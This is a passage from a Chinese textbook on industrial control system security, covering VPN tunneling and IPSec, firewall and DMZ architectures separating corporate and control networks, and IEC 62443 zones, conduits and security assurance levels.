Tunneling Technology)。隧道是一种通过互联网 在网络之间传递数据的方式。通过将待传输的原始信息经过加密和协议封装处理后再嵌套 装入另一种协议的数据包送入网络中像普通数据包一样进行传输,到达另一端后被解包。 只有源端和宿端的用户对隧道中的嵌套信息进行解释和处理,而对其他用户而言只是无意 义的信息。 在 VPN 中主要有两种隧道。 一种是端到端的隧道,主要实现个人主机之间的连接, 端设备必须完成隧道的建立,对端到端的数据进行加密和解密;另一种是节点到节点的隧 道,主要用于连接不同地点的 LAN, 数据到达 LAN 边缘 VPN 设备时被加密并传送到隧 道的另一端,在那里被解密并送入相连的LAN。 与隧道技术相关的协议分为第二隧道协议和第三隧道协议。第二隧道协议主要有 PPTP 、L2TP 和 L2F 等,第三隧道协议主要有 GRE 及 IPSec 等。 3. 用户身份认证技术 在正式的隧道连接开始之前需要确认用户的身份,以便进一步实施资源访问控制或用 户授权。用户身份认证技术 (User Authentication Technology) 是相对比较成熟的一类技 术,因而可以考虑对现有技术的集成。 4. 访问控制技术 访问控制技术 (Access Control Technology) 就是确定合法用户对特定资源的访问权 限,由 VPN 服务的提供者与最终网络信息资源的提供者共同协商确定特定用户对特定 资源的访问权限,由此实现基于用户的细粒度访问控制,从而实现对信息资源最大限度 的保护。 3.3.5 虚拟专用网的协议 VPN 涉及三种协议,分别是乘客协议、封装协议和承载协议。 (1)乘客协议是被封装的协议,如 PPP、SLIP。 (2)封装协议用于隧道的建立、维持和断开,如点对点隧道协议 (PPTP)、 第二层隧 道协议 (L2TP), 第三层隧道协议 IPSec 等,也称为隧道协议。 (3)承载协议是承载经过封装后的数据包的协议,如IP 和 ATM 等。 1. 常见虚拟专用网的协议 常见虚拟专用网的协议是点对点隧道协议、第二层隧道协议和第三层隧道协议。下面 对这三种协议进行介绍。 1)点对点隧道协议 点对点隧道协议是一个最流行的互联网协议,它提供 PPTP 客户机与 PPTP 服务器之 间的加密通信,允许公司使用专用隧道,通过公共互联网来扩展公司的网络。通过互联网 的数据通信,需要对数据流进行封装和加密,PPTP 就可以实现这个功能,从而可以通过 互联网实现多功能通信,也就是说,通过 PPTP 的封装或隧道服务,使非 IP 网络可以获 得进行互联网通信的优点。 2)第二层隧道协议 L2TP 综合了其他两个隧道协议 (Cisco 的第二层转发协议 L2F 和 Microsoft 的点对点 隧道协议 PPTP) 的优点。L2TP 是一个工业标准互联网隧道协议,由 Intranet Engineering Task Force(IETF) 管理,目前由Cisco、Microsoft、Ascend、3Com 和其他设备供应商联 合开发并认可。 L2TP 主要由接入集中器 (LAC) 和 L2TP 网络服务器 (LNS) 构成。LAC 支持客户 端的 L2TP 用于发起呼叫、接收呼叫和建立隧道, LNS 是所有隧道的终点。在传统的 PPP 连接中,用户拨号连接的终点是LAC,L2TP 使得 PPP 协议的终点延伸到 LNS。在安全性 考虑上,L2TP 仅仅定义了控制包的加密传输方式,对传输中的数据并不加密。因此, L2TP 并不能满足用户对安全性的需求。如果需要安全的 VPN, 则依然需要下述 IPSec 的 支持。 这些结构都严格通过点对点方式连接,所以很难在大规模的 IP VPN 下使用,同时这 种方式需要额外的计划和人力来准备和管理,对网络结构的任意改动都将花费数天甚至数 周的时间,而在点对点平面结构网络上添加任意节点都必须承担刷新通信矩阵的巨大工作 量,并且要为所有配置增加新站点后的拓扑信息,以便让其他站点知其存在,这将导致此 类 VPN 异常昂贵,也使大量需要此类服务的中型企业和部门望而却步。 3)第三层隧道协议 在利用隧道方式来实现 VPN 时,除了要充分考虑隧道的建立及其工作过程之外,另外一个重要问题是隧道的安全。第二隧道协议只能保证在隧道发生端及终止端进行认证和 加密,而隧道在公网的传输过程中并不能完全保证安全。IPSec 加密技术则是在隧道外面 再封装,从而保证了隧道在传输过程中的安全性。 2.IPSec 体系 IPSec 是 LETF IPSec 工作组于1998年制定的一组基于密码学的开放网络安全协议, 总称 IP 安 全 (IP Security) 体系结构,简称 IPSec。 1)IPSec 的简介 IPSec 的目的就是要有效地保护 IP 数据包的安全,它提供了一种标准的、强大的,以 及广泛包容的机制,为 IP 及上层协议提供安全保证,并定义了一套默认的、强制实施的 算法,以确保不同的实施方案之间可以共通,并且很方便扩展。 IPSec 可保障主机之间、安全网关之间或主机与安全网关之间的数据包安全。由于受 IPSec 保护的数据包本身只是另一种形式的 IP 包,所以完全可以嵌套提供安全服务,同时 在主机间提供端到端的验证,并通过一个安全通道将那些受IPSec 保护的数据传送出去。 IPSec 是一个工业标准网络安全协议,其有两个基本目标:保护 IP 数据包安全和为抵 御网络攻击提供防护措施。IPSec 结合密码保护服务、安全协议组和动态密钥管理共同实 现这两个目标。 2)IPSec 的优点 IPSec 的优点主要有以下几点。 (1)IPSec 比其他同类协议具有更好的兼容性。 (2)比高层安全协议(如 SOCKS5) 的性能更好,实现更方便;比低层安全协议更能 适应通信介质的多样性。 (3)系统开销小。 (4)透明性好。 (5)管理方便。 (6)开放性好。 3)IPSec 体系结构 IPSec 主 要 由 认 证 头(Authentication Header,AH) 协 议 、 封 装 安 全 载 荷 (Encapsulation Security Payload,ESP) 协议及负责密钥管理的互联网密钥交换 (Internet Key Exchange,IKE) 协议组成。其体系结构如图3-4所示,各部分介绍如下。 (1)IPSec 安全体系:包含一般概念、安全要求和定义IPSec 的技术机制。 ( 2 ) 认 证 头(AH) 协议:主要用于保护数据的完整性和对IP 包进行鉴别。 (3)封装安全载荷 (ESP) 协议:用于为IP 报文提供保密性业务和可选的数据完整性 保护。 ( 4 ) 解 释 域 (DOI):IPSec 的通信双方能相互交互,并且通信双方应该理解 AH 协 议 和 ESP 协议中各字段的取值,因此,通信双方必须保持对通信消息相同的解释规则,包括一些参数、批准的加密和鉴别算法标识,以及运行参数等。 (5)加密算法:描述如何将不同加密算法用于ESP。 (6)认证算法:描述如何将不同鉴别算法用于AH 和 ESP 可选的认证选项中。 (7)互联网密钥交换 (IKE) 协议:描述密钥管理机制的文档,包括如何协商密钥、 分发密钥等。IKE 协议是默认的密钥自动交换协议,密钥协商的结果通过 DOI 转换为 IPSec 的参数。 (8)安全关联 (SA): 包括通信双方协商好的安全通信的构建方案。 3.4 控制网络逻辑分隔 工业控制系统网络至少应通过具有物理分隔网络的设备与公司管理网络进行逻辑分 隔。公司管理网络与工业控制系统网络有连接要求时,应该做到以下几点: (1)公司管理网络与工业控制系统网络的连接必须有文件记载,并且尽量采用最少的 访问点,如有冗余的访问点,也必须有文件记载。 (2)公司管理网络与工业控制系统网络之间宜安装状态包检测防火墙,只允许明确授 权的信息访问流量,对其他未授权的信息访问流量一概拒绝。 (3)防火墙的规则不仅要提供传输控制协议 (TCP) 和用户数据报协议 (UDP) 端 口的过滤、网间控制报文协议(ICMP) 类型和代码过滤,还要提供源端和目的地端的 过滤。 公司管理网络与工业控制系统网络之间一个可接受的通信方法是在两者之间建立一个 中间非军事化区 (DMZ) 网络。这个非军事化区应连接至防火墙,以确保定制的通信仅 在公司管理网络与非军事化区之间、工业控制系统网络与非军事化区之间进行。公司管理 网络与工业控制系统网络之间不可以直接相互通信。这个方法将在3.5节详细介绍。 工业控制系统网络与公司外部网络之间的通信应采用虚拟专用网络技术。 3.5 网 络 隔 离 公司管理网络(简称公司网)与工业控制系统网络(简称控制网)之间通过采用不同 的架构进行网络隔离,加强网络信息安全。下面详细介绍几种可能用到的架构,并分析各 种架构的优缺点。注意:各种架构图采用防火墙进行网络隔离,只是示意防火墙的位置, 并非示意公司管理网络或工业控制系统网络中的所有设备。 3.5.1 双宿主计算机 双宿主计算机能把网络信息流量从一个网络传到另一个网络。如果其中任何一台计算 机不配置安全控制,都将带来威胁。为防止这种威胁,除防火墙外,任何系统均不可以延 伸公司管理网络与工业控制系统网络。公司管理网络与工业控制系统网络之间必须通过防 火墙连接。 3.5.2 防火墙位于公司网与控制网之间 在控制网和公司网之间增加一个简单的两个口防火墙,如图3-5 所示,极大地提高了控 制系统的信息安全。进行合理配置后,防火墙就可以进一步减少控制网被外来攻击的机会。 图3-5 防火墙位于公司网与控制网之间 但是这种设计也会带来以下问题: (1)数据历史服务器放在公司网,防火墙必须允许数据历史服务器与控制网的控制设备进行通信。来自公司网带有恶意的或配置不当的主机的 一个数据包将发送到 PLC 或 DCS 。 如果数据历史服务器放在控制网,那么防火墙规则必须允许公司网的所有主机与数 据历史服务器进行通信。这种典型通信通过 SQL 或 HTTP 请求发生在应用层,数据历史 服务器应用层代码的缺陷将导致数据历史服务器损伤。 一旦数据历史服务器损伤,控制网 的其他节点就易于蠕虫传播或相互攻击。 (2)在两个网络之间采用简单防火墙,欺骗的数据包能够形成并影响控制网,潜在地 允许转换数据在允许协议中打开通道。例如,若 HTTP 包允许穿过防火墙,则木马软件会 无意中进入 HMI, 或者控制网的计算机将被远程机构控制并发送数据给这个机构,伪装 成合法的流量。 总之,这种架构比没有隔离的网络更安全,采用防火墙规则允许两个网络间的设备直 接通信,但是如果没有精心设计和监视,有可能出现安全漏洞。 3.5.3 防火墙与路由器位于公司网与控制网之间 更成熟的架构设计是采用路由器与防火墙组合,如图3-6 所示。路由器安装在防火墙 前面,进行基本的包过滤,而防火墙将采用状态包检测技术或代理网关技术处理较复杂的 问题。这种设计针对面向互联网的防火墙,允许较快地路由处理大量进入的数据包,尤其 是拒绝服务 (DoS) 攻击,从而降低防火墙的负荷。同时,这种设计提供纵深防护,即对 方需穿过两个不同设备。 3.5.4 带 DMZ 的防火墙位于公司网与控制网之间 1. 架构说明 更进一步的设计架构是使用的防火墙能在控制网和公司网之间建立非军事区 (DMZ) 。 每个 DMZ 装有一台或多台关键设备,如数据历史服务器、无线访问点、远程和 第三方访问系统。实际上,采用带 DMZ 功能的防火墙允许创建一个中间网络。 建立一个 DMZ, 要求防火墙提供3个或4 个接口,其中, 一个接口接入公司网,第 二个接口接入控制网,余下的接口接入 DMZ 内的数据历史服务器、无线访问点等,其架 构图如图3-7所示。 公司级需要访问的设备放置在 DMZ, 那么公司网与控制网就没有直接的通信途径。 如图3-7 所示,防火墙能够阻止任意来自公司网的数据包进入控制网,同时也能控制来自 其他区的流量。通过计划好的规则集,就能在控制网和其他网之间维持一个明确的界限。 若控制网要用代理服务器、防病毒服务器或其他安全服务器,则这些服务器必须放在 DMZ 中。 图3-7 带 DMZ 的防火墙位于公司网与控制网之间 这种架构的主要风险是,如果 DMZ 的一台计算机遭到损坏,那么它就能够通过允许的 应用程序对控制网发起攻击。通过努力加固和修复这些服务器,这种风险可以降低,另外这种架构会增加复杂程度和成本,但是对于较关键的系统,提高安全性能可以弥补这些缺点。 2. 应用举例——远程访问系统 (RAS) 1)系统简介 远程访问系统(Remote Access System,RAS) 有时也称为远程维修系统 (Remote Maintenance System,RMS),是一个提供先进远程连接、允许技术支持团队通过实时信息处 理的系统。远程访问系统通过双方都接入Internet 的手段连接目标工业控制系统或所需维护管 理的工业控制系统,通过工业控制系统供应商或本地集成商对远程系统进行配置、安装、维 护、监控与管理,解决以往服务工程师必须亲临现场才能解决的问题。这种连接能够使技术 专家进行远程分析,提供及时的技术支持,给控制系统用户更多的时间,大大降低了工业控 制系统的维护成本,最大限度地减少了用户损失,实现了高效率、低成本的服务方式。 远程访问系统的对象是工业控制系统,可以是全厂 DCS, 也可以是部分大型工艺设 备的控制系统,如 PLC 系统,但不可以是 SIS 。 因 为 SIS 的安全等级要求很高,不允许接 入 Internet, 在《石油化工安全仪表系统设计规范》GB/T50770—2013 相关条文中已明确 规定。 远程访问系统是工业控制系统与信息技术系统相结合的系统,是新型工厂维修的完美 解决方案。它能够实现对目标系统的远程分析、远程监视、远程故障探测和远程故障处 理。通过远程监视和诊断,许多产品开发错误可以在早期被发现,许多产品故障可以提前 被发现和处理,也意味着在需要时可进行维修,而不用等到固定的维修周期。它使得生产 现场和供应商或集成商的信息沟通变得方便快捷,是公司维修不可缺少的组成部分。 经过多年的开发应用,远程访问系统已广泛应用于电力、冶金、安防、水利、污水处 理、石油天然气、化工、交通运输、制药,以及大型制造等行业。 目前市场上出现的远程访问系统产品比较多,并且都是由知名品牌的工业控制系统供 应商或大型机组设备供应商提供的,如 Honeywell 公司的 DCS 远程访问系统, Siemens 公 司的远程访问系统、ABB 公司的 DCS 远程访问系统等。 远程访问系统用户可以获得以下支持: (1)快速响应(24小时)。 (2)加速双向交流。 (3)通过在线访问系统数据实现远程故障探测。 (4)大多数情况下不需要一个现场服务工程师。 (5)减少停工时间。 (6)减少维修成本。 2)方案部署 远程访问系统的架构一般由公司区域、非军事区域和工厂控制区域组成。 生产运营公司对公司的工业控制系统和特殊设备要有一个明确的维修策略,例如,如 何组织维修,哪些控制系统部分需要维修支持,需要哪种维修支持,如何建立这些维修 等。因此,基于公司的维修策略,有的公司需要远程访问系统,而有的公司则不需要远程 访问系统。目前,常见的用于生产装置的远程访问有两种: 一种是针对 DCS 的控制系统;另一种是针对特殊设备的远程访问系统,如 PLC 系统等。 (1)DCS 远程访问系统 DCS 作为基本的控制系统,已广泛应用于电力、冶金、安防、水利、污水处理、石 油天然气、化工、交通运输、制药,以及大型制造等行业中,在生产运营中起着非常关键 的作用,而 DCS 的运行和维护是一项专业要求很高的技术工作,所以 DCS 的系统供应商 都会建立其产品售后技术支持。随着信息技术的发展,传统的由技术服务工程师到现场服 务的模式已演变为由技术专家进行远程访问系统技术支持的模式,为用户节省了时间和成 本,极大地提高了维修效率和质量。因此,DCS 远程访问系统逐渐发展起来,其典型方 案部署如图3-8所示。 图3-8 DCS 远程访问系统典型方案部署 这种典型的 DCS 远程访问系统包括4 个信息安全区域,分别是公司区域、非军事区 域、工厂控制区域和供应商区域。供应商区域是供应商提供远程访问和维修服务的平台, 一般由应用服务器、工作站、相关设备组成。工厂控制区域是用户正在运行的系统,是远 程访问和维修的目标系统,由所有控制网络设备组成,包括工程师站、操作员站、OPC 服务器、数据历史服务器、控制器、维修服务器等组成。非军事区域是远程访问的中间网 络,负责远程访问的管理,通常包括中继服务器。公司区域是用户 DCS 远程访问系统对外联系的必经网络。 在开始设计时,用户需要明确指出工厂控制系统的哪些设备需要进行 DCS 远程访问 维护,与供应商一起搭建 DCS 远程访问系统。 维修服务器是一个提供访问和传送数据安全方式的数据采集和分析工具的服务器。维 修服务器安装在用户集成、维护保养方便的 DCS 中,是一个可在 DCS 操作的工具,是 DCS 远程访问系统的一个关键设备。维修服务器的硬件和软件通常由 DCS 供应商提供, 以满足后续的维修能力。 中继服务器是一个管理远程访问的服务器,是远程访问的桥梁。中继服务器安装在 DMZ, 也是 DCS 远程访问系统的一个关键设备。中继服务器的硬件和软件可以由DCS 的 系统供应商提供,也可以由用户自行采购和配置,以满足后续的远程维修管理。 (2)特殊设备远程访问系统 特殊设备在生产运营中起着关键的作用。特殊设备通常配置相应的控制系统,其运行 和维护是一项专业要求很高的技术工作,所以特殊设备供应商均建立其产品售后技术支 持。特殊设备远程访问系统的典型方案部署如图3-9所示。 图3-9 特殊设备远程访问系统的典型方案部署 这种典型特殊设备远程访问系统包括4个信息安全区域,分别是公司区域、非军事区 域、工厂控制区域、供应商区域。供应商区域是供应商提供远程访问和维修服务的平台, 一般由应用服务器、工作站和相关设备组成。工厂控制区域是用户正在运行的系统,是远程访问和维修的目标系统,由所有控制网络设备组成,包括工程师站、操作员站、PLC、 现场操作终端等。非军事区域是远程访问的中间网络,负责远程访问的管理,通常为中继 服务器。公司区域是用户特殊设备远程访问系统对外联系的必经网络。 在开始设计时,用户需要明确指出工厂控制系统的哪些设备需要进行特殊设备远程访 问维护,与供应商一起搭建特殊设备远程访问系统。 中继服务器是一个管理远程访问的服务器,是远程访问的桥梁。中继服务器安装在 DMZ 中,是特殊设备远程访问系统的一个关键设备。中继服务器的硬件和软件一般由用 户自行采购和配置,以满足后续的远程维修管理。 3.5.5 双防火墙位于公司网与控制网之间 1. 架构说明 对前面架构稍加变化,就出现采用双防火墙的架构,如图3-10 所示。数据历史服务 器等公用服务器放置在类似 DMZ 的网络区,有时又称为生产制造系统 (MES) 层。如 3.5.4 节所述,第一道防火墙能够阻止任意来自公司网的数据包进入控制网或公用服务 器;第二道防火墙能够阻止受损服务器中不必要的流量进入控制网,同时阻止控制网的流 量冲击公用服务器。 第3章 工业控制系统信息安全技术与方案部署 如果这两个防火墙是两个不同的生产商,那么这种方案有优势。在一个公司组织内, 这也对控制组和 IT 组有明确的职责界定。这种架构的主要缺点是成本增加且管理复杂。 这对于有严格安全要求的场合或需要明确管理界限的情况来说是很好的优势。 2. 应用举例——工厂信息管理系统 (PIMS) 1)系统简介 工厂信息管理系统是工业控制系统与信息技术系统相结合的系统,是新型的工业信息 系统工程提供的完整解决方案,它能有效集成全厂生产信息,形成安全、可靠的实时数据 库,填补了企业经营管理系统和工业控制系统之间的信息鸿沟,实现了企业网络环境下的 实时数据采集、实时流程查看、实时趋势浏览、报警记录与查看、开关量变位记录与查 看、报表数据存储、历史趋势存储与查看、生产过程报表生成、生产统计报表生成等功 能,从而实现了企业过程控制系统与信息系统的网络集成、综合管理,使管理层能够及 时、准确地了解生产情况,发现生产中的问题,并为先进控制软件提供应用平台,使得办 公室和生产现场的信息沟通变得方便、快捷,是企业信息化建设中不可缺少的组成部分。 经过多年的开发应用,工厂信息管理系统已广泛应用于电力、冶金、安防、水利、污 水处理、石油天然气、化工、交通运输、制药及大型制造等行业。为了实现节能高效生 产,同时加强公司内部管理,许多公司从建厂初期就十分注重企业信息化建设,准备组织 实施多套计算机应用软件系统,包括生产信息管理、办公自动化 (OA) 、 企业资源计划 (ERP) 等。在生产信息管理应用上要求实现生产实时数据采集与发布、能源计量管理、 设备管理、库存管理等功能,从而达到生产信息的综合处理,构成公司的综合生产信息管 理系统。 目前市场上出现的工厂信息管理系统的产品比较多,有国外的产品,也有国内的产 品。国外的产品主要有 OSI 公司的 PI 、Aspen 公司的 InfoPlus 、Honeywell 公司的 PHD 、 Instep 公司的 eDNA 等;国内的产品主要有力控公司的 pSpace、中科院软件所的安捷 (Agilor) 、 浙大中控的 ESP-iSYS 、紫金桥的 RealDB 等。 工厂信息管理系统不仅可用于连续生产工艺过程的生产装置,而且可用于批次生产工 艺过程的生产装置。 2)方案部署 工厂信息管理系统的架构一般由公司区域、非军事区域和工厂控制区域组成,有实验 室信息管理系统 (LIMS) 的公司会有实验室信息区域,工厂控制区域有时还包括安全控 制区域。 每个公司都有一个或多个生产装置,每个生产装置采用 DCS、PLC 或 SIS控 制 。DCS 或 PLC 控制系统可作为生产过程控制或能源计量采集站; SIS 可作为生产过程安全连锁控 制。因此,每个公司的生产控制区域会有所不同。 当公司规模较大时, 一般有多个生产现场或分公司。为了及时了解各分公司的运营情 况,协调原材料供应、销售、维修等,通常会在总公司建立公司中心 PIMS, 实现各 PIMS子系统的集中管理。 下面以 Aspen 公司的 InfoPlus 应用在一个有4个分厂的公司为例,来介绍该工厂信息 管理系统的方案部署。公司有3个连续工艺过程分厂和一个批次生产工艺过程分厂,每个 分厂的工厂控制系统均采用知名品牌的 DCS, 实验室采用实验室信息管理系统 (LIMS)。 根据公司的 DCS 、LIMS 及办公室局域网 (LAN), 按照工业控制系统信息安全要求,合 理配置工厂信息管理系统的系统结构,其方案部署如图3-11所示。 该工厂信息管理系统由公司区域、非军事区域、工厂控制区域和实验室信息区域组 成。其中,工厂控制区域包括安全控制区域。公司区域是公司办公局域网, PIMS 用户均 分布在这个区域;非军事区域是 PIMS 主服务器 (PIMS Main Server) 和批量服务器 (Batch.21 Server) 放置的区域,将公司区域与工厂控制区域分隔;工厂控制区域是工厂控 制系统的区域,包括 DCS、PLC、SIS 等,其中SIS 是安全控制区域,通过通信与 DCS 进 行信息交换,通过 OPC 将 SIS 的事件和报警记录送至 DCS 的 OPC 服务器;实验室信息 区域是实验信息服务器与实验信息用户端的区域。 InfoPlus.21 是一个用于采集与存储大量过程数据的实时数据库管理系统,支持各种类 型的用户事务处理及生产方面的应用。这种系统的结构特点是模块化设计。InfoPlus.21 实 时数据库管理系统主要包括以下几个部分。 (1)PIMS 主服务器:安装 InfoPlus.21 的实时数据库管理系统, InfoPlus.21 通过 OPC 服务器(安装在 DCS 的一台应用站上)读取 DCS 中的过程变量。 (2)批量服务器:安装了批量数据管理系统 Production Record Manager 、Aspen Batch 、Event Extractor, 以及支撑 Production Record Manager 的关系型数据库 Microsoft 的 SQL Server 。Production Record Manager通过数据的抽取功能,直接从DCS 的批量过程历 史数据库中抽取相关批量信息数据。 (3)开发接口:在 OPC 服务器站,通过 CIM-IO 服务器与 DCS 通信读取 DCS 中的 过程变量;利用 ODBC 协议把LIMS 中的化验数据存放到 InfoPlus.21 系统中。 (4)防火墙:实现 InfoPlus.21 实时数据库管理系统与办公室局域网 (LAN) 、 工厂控 制网的安全隔离。 网络隔离小结如下: 总之,不带防火墙的架构将不能在公司网和控制网之间提供合适的隔离。不带 DMZ 的两个区的方案较少采用,并且方案部署要特别小心。最安全、易管理且好扩展的网络隔 离方案至少基于三个区,并且有一个或多个 DMZ 的系统。 3.6 纵深防御架构 单个安全产品、技术和解决方案不能完全保护控制系统。 一个涉及两种或多种重叠安 全机理的多层策略(在技术上称为纵深防御)是普遍需要的,即便任何一种安全机理出现 故障,这种冲击也是最小的。纵深防御架构策略通常包括防火墙的采用、DMZ 的建立和 入侵检测能力,并配置有效的安全策略、培训程序和事件响应机制。此外,有效的纵深防 御架构策略需要一个对控制系统可能攻击媒介的全面了解,具体包括如下。 (1)网络周边的后门和漏洞。 (2)通用协议漏洞。 (3)现场设备攻击。 (4)通信黑客和“中间人”攻击。 美国国土安全部已推荐有关工业控制系统的纵深防御架构,其纵深防御架构策略图如 图3-12 所示,受到业界的普遍关注,也被业界广泛参考。其纵深防御架构策略适用于使 用工业控制系统且保持多层信息架构的公司或机构。 这个纵深防御架构包括工业控制系统所需的防火墙、DMZ 的使用和入侵检测能力。 其中,多个 DMZ 的使用目的为把功能和访问权限分开,并且已证实对有多个网络和不同 运作要求的大架构非常有效。 同时应该看到,随着信息技术的发展和应用,这个纵深防御架构中的 Modem 由于不 安全而不被采用,已越来越多地由 VPN 的成熟技术所取代。 第4章 工业控制系统信息安全风险评估 4.1 系 统 识 别 工业企业应对本公司工业控制系统进行系统范围的明确定义,即需考虑工业控制系统 信息安全的范围、边界、设备和所有控制系统的访问点。 需考虑的系统,是指公司工业控制系统与信息安全相关的部分,并非指整个工业控制 系统,是与信息安全相关的设备和网络的总称。 ①业容制系究信息安全(第2版) 首先,在进行系统识别时,对需考虑的系统的所有设备要有区分,即哪些设备可以接 受外部网络访问、哪些设备不可以接受外部网络访问,以及哪些设备需要建立外部网络访 问、哪些设备不需要建立外部网络访问。 其次,在进行系统识别时,对需考虑的系统的所有网络要有区分,即哪些网络可以接 受外部网络访问、哪些网络不可以接受外部网络访问,以及哪些网络需要建立外部网络访 问、哪些网络不需要建立外部网络访问。 最后,在进行系统识别时,对需考虑系统需要的所有网络访问点应该明确定位。 4.2 区域与管道的定义 在 IEC 62443 中介绍了“区域”和“管道”的概念,可通过这种方式对控制系统的各 个子系统进行分段管理。 4.2.1 区域的定义 1. 概述 按照 IEC 62443 中的定义,区域是由逻辑的或物理的资产组成的;并且共享通用的信 息安全要求。区域是代表需考虑系统分区的实体集合,基于功能、逻辑和物理关系。 区域可以是一些独立资产的组合,也可以是一些子区域的组合,或者是一些独立资产 和一些子区域的资产的组合,这些子区域包括在大区域内。区域具有继承性的特点,即子 区域必须满足大区域的要求。如图4-2 所示是多装置区域模型图,在这个模型中,公司区 域是大区域,每个装置是子区域,每个装置子区域又带有一个控制子区域。同样地,公司 架构也可以是几个独立区域的组合,如图4-3 所示。在这个模型中,区域的安全方针是相 互独立的,每个区域都要有完全不同的安全方针。 区域内的设备有着相同的信息安全保证等级 (SAL) 能力,如果设备的信息安全能力 达不到要求的能力,那么就必须采取额外的保证措施。任何两个区域间的通信都必须通过 管道进行。通过管道可以控制对区域的访问,以防止拒绝服务 (DoS) 攻击或恶意代码的 传播,从而屏蔽其他网络系统和保护网络流量的完整性和保密性。典型地,对管道的控制 意图是缓解区域间信息安全保证等级能力及其信息安全要求之间的不同。把焦点放在管道 的控制上是一种性价比非常好的方法,因为这样就不用对区域内的每个设备或计算机都进 行升级以满足系统能力的要求。 图4-2 多装置区域模型图 图4-3 分开区域模型图 2. 信息安全区域的定义 在工业控制系统中定义和设计区域、管道的目的是将具有相同功能和信息安全要求的 设备分成组进行标识和分析,从而有利于对设备和操作的管理。这样需要保护的就不是单 个设备而是整个区域。例如,各类设施最初按操作进行分区,接下来就可以按照功能进行 分层,如 MES 、监控系统(如 HMI) 、主控系统(如 DCS 控制器、RTU 和 PLC 等)和仪 表安全系统 (SIS)。 区域的定义可以通过区域参数或属性进行。对关键区域的实现要求,包括:区域描述 (名称、定义的功能)、区域边界、典型的资产/库存、从其他区域的继承、区域的风险评 估(区域资产的信息安全能力、威胁/脆弱性、信息安全破坏的后果、关键业务的影响 等)、信息安全的目标和战略、验收使用政策、内部区域的连接(如访问要求),以及变更 管理过程。 每个区域不仅要定义其边界、资产和风险分析,而且要包括信息安全能力,因此区域 内使用Windows 2008 操作系统服务器的信息安全能力与区域内使用Windows NT 操作系 统服务器的不同。区域内可能面临的信息安全风险,与控制风险需要具有的信息安全能力 一起决定并用于管道的信息安全功能要求,从而利用管道进行区域间的连接。已完成的 IEC 62443-3-3 部分——工业过程测量和控制安全-网络、系统安全要求和安全保证等级 (SAL) 就是帮助用户定义这些信息安全能力和要求的。 区域也可以根据控制资产的继承性来定义其信息安全能力,如旧款 PLC 在鉴别方面 的措施就非常差,可以将这些 PLC 放在已经提供了额外防护措施的区域中。 4.2.2 管道的定义 1. 概述 按照IEC62443 的定义,管道是连接两个或多个共享安全要求区域通信渠道的逻辑组。 管道是一种特殊类型的安全区域,成组信息按逻辑被编成信息组在区域内或区域外流 动。它可能是单个服务(单一以太网)或由多个数据载体组成(多根网络电缆和直接的物 理存取通路)。与区域一样,它由物理的与逻辑的两种结构组成。管道可连接区域内的实 体,或连接不同区域的实体,如图4-4所示是公司管道举例。 管道中是数据信息流,信息需要在安全区域内流入与流出,甚至在非网络化系统 中,也会存在通信(如创建和维持系统、可编程设备的间断连接等)。为涵盖通信的安 全方面,以及提供包括通信特殊要求的结构, IEC 62443 定义了专门的安全区域,即通 信管道。 与区域相同,管道可以是可信的,也可以是不可信的。典型的可信管道不越过区域边 界,在区域内通过通信处理。越过区域边界的可信管道需要使用端到端的安全处理。 图4- 4 公司管道举例 2. 信息安全管道定义 定义管道的方法很多,最常用的就是通过分析区域间的数据流来发现路径,但是这个 过程通常非常复杂,因为要分析和判断流通的数据,最好将数据的流向也详细分析清楚。 区域间经过的数据就是网络的管道,每个管道定义时都要考虑其连接的区域,所使用的技 术、传输的协议,以及连接区域时所要满足的信息安全特性要求等。确定网络中区域间信 息的传输通常使用数据流量或简单的协议分析器。同时,还要分析在网络信息传输中,哪 些是隐式的流量,如有没有通过 USB 驱动传输的文件、有没有使用电话调制解调器远程 连接到 RTU。这些流量也会导致严重的信息安全问题。 如图4-5 所示的数据流图总结了管道和它们包含的流量。每个区域都可以看作一个节 点,而每条数据流都可以看作一个向量。 图4-5 数据流图 与区域一样,每个管道都有自身的特点和安全要求,包括以下几点: (1)安全方针。 (2)资产库存。 (3)访问求和控制。 (4)威胁与漏洞。 (5)违反安全的后果。 (6)授权的技术。 (7)变更管理过程。 (8)连接的区域。 通常,高层次工艺流程工业的管道和区域典型图如图4-6所示。图中有3个信息安全 区,每个信息安全区的要求是不同的,有两条管道连接各自的区域。 IEC 62443 系列标准没有明确规定企业应如何定义它们的区域或管道。相反,针对计 算机可能发生的攻击,此系列标准基于对企业风险的评估提供所需要满足的相关要求。既 然风险是计算机事件加上事件造成结果的可能性函数,那么针对每个具体的设施,就要实 施应有的区域、管道和保护。 图4 - 6 高层次工艺流程工业的管道和区域典型图 4.2.3 区域定义模板 为了提高管理风险的效率,公司可以建立通用安全区域方法,其中 一种方式是采用 公司模板架构,这个模板架构包含公司不同设备和系统的网络隔离策略及安全区域,如 图4-7所示是一个公司安全区域模板架构图。 4.3 信息安全等级 根据前面几节的内容分析可知 , 一 个 区 域 或 管 道 的 信 息 安 全 要 求 是 相 同 的 , 而不同区域或管道的信息安全要求又各不相同 ,由此引入信 息 安 全 等 级(Security Level,SL)的 概 念 。根 据 IEC 62443 中 的 定 义 , 信 息 安 全 等 级 是 对 应 于 基 于 区 域 或 管 道 的 风 险 评 估 所 需 设备 和 系 统 的 对 策 及 固 有 特 性 的 有 效 性 等 级 。目 前 , 国 际 上 针 对 工 业 控 制 系 统 的 信 息 安 全 等 级 定 义 还 处 于 起 步 阶 段 , 尚 无 统 一 的 标准 。 信 息 安 全 等 级 与 系 统 能 力 等 级 和 管 理 等 级 有 一 定 的 关 联 性 。 第4章工业控制系统信息安全风险评估 4.3.1 安全保障等级 IEC 62443中引入了信息安全保障等级 (Security Assurance Level,SAL) 的概念,尝 试用一种定量的方法来处理一个区域的信息安全事务,它既适用于终端用户公司,也适用 于工业控制系统和信息安全产品供应商。通过定义并比较用于信息安全扫描周期的不同阶 段的目标安全保障等级 (SAL-T) 、 达到安全保障等级 (SAL-A) 和能力安全保障等级 (SAL-C), 实现预期设计结果的安全性。 目标安全保障等级 (SAL-T) 是指为特定系统设定的 SAL, 通常用于系统信息安全的 风险评估阶段,目标 SAL 是为了保证系统正常运行,系统的信息安全要达到规定的等级。 达到安全保障等级 (SAL-A) 是指特定系统信息安全实际的 SAL 等级。在系统信息 安全实现并运行后,虽然最初设计系统信息安全时设定了目标 SAL, 但是对实际运行的 系统评估后会得到 SAL。 能力安全保障等级 (SAL-C) 是指系统或组件正确配置时的信息安全等级。能力 SAL 表示特定的系统或组件在其系统信息安全正确配置和集成时,能够满足目标 SAL 而不用 增加额外的措施。 根据IEC 62443 